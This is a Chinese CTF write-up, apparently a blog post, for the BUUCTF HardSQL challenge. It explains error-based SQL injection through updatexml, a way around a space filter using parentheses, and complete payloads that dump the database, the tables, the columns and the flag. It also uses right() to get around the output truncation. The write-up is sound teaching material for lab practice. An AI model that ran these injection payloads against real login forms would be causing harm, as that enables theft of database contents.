web buuctf [极客大挑战 2019]HardSQL1

这题做了一下午,后来翻了一下别人的wp才发现,过滤了空格,服了。。

考点:报错注入

报错注入的应用是sql注入,页面无显示位,但有数据库的报错信息

报错注入使用函数(updatexml(xml_taget,xpath,new_xml)),这个函数是用来更新指定的xml文件,xpath的格式通常是为xx/xx/xx,传进去字符串就会报错,也就会显示报错信息,

利用updatexml(1,concat(0x7e,database()),2)

concat函数将里面内容连成字符串,与xpath的格式不符,所以会报错

0x7e的axii码为~,updatexml报错信息的内容为特殊字符、字母之后的内容,为了防止查询结果丢失加上特殊字符

爆数据库database()

爆表select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())

爆字段:

select(group_concat(column_name))from(information_schema.columns)where(table_name)like

('表名')

爆内容:

select(group_concat(字段)from(表))

注意爆字段的时候表名需要有单引号,爆内容时不需要加

1.打开页面,是用户正常的登录界面,进行sql注入

先判断注入类型字符还是数字

1 or 1=1#

1' or '1=1'#

界面显示都挂了,都存在过滤,之后试了试大写小和双写都不行

2.报错注入

输入1',界面提示报错,根据报错,说明是字符型输入,利用报错信息回显flag

注意这里面过滤了空格,所以需要用()把sql语句圈起来,不能留空格

如下:

查询数据库?username=1&password=1'or(updatexml(1,concat(0x7e,database()),1))%23

查询表

 ?username=1&password=1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))),1))%23

查询字段: 

?username=1&password=1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))),1))%23

爆字段内容:

?username=1&password=1'or(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(H4rDsq1))),1))%23 

flag{7c28faad-3046-409f-a4

不完全,这里是因为extractvalue和updatexml只显示32位字符

用right(string,num)显示password的右边 

将id,username,password替换为right(password,30)

值为d-3046-409f-a4f4-0ef437a8372c}

拼接后得: flag{7c28faad-3046-409f-a4f4-0ef437a8372c}

 

  • 3
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值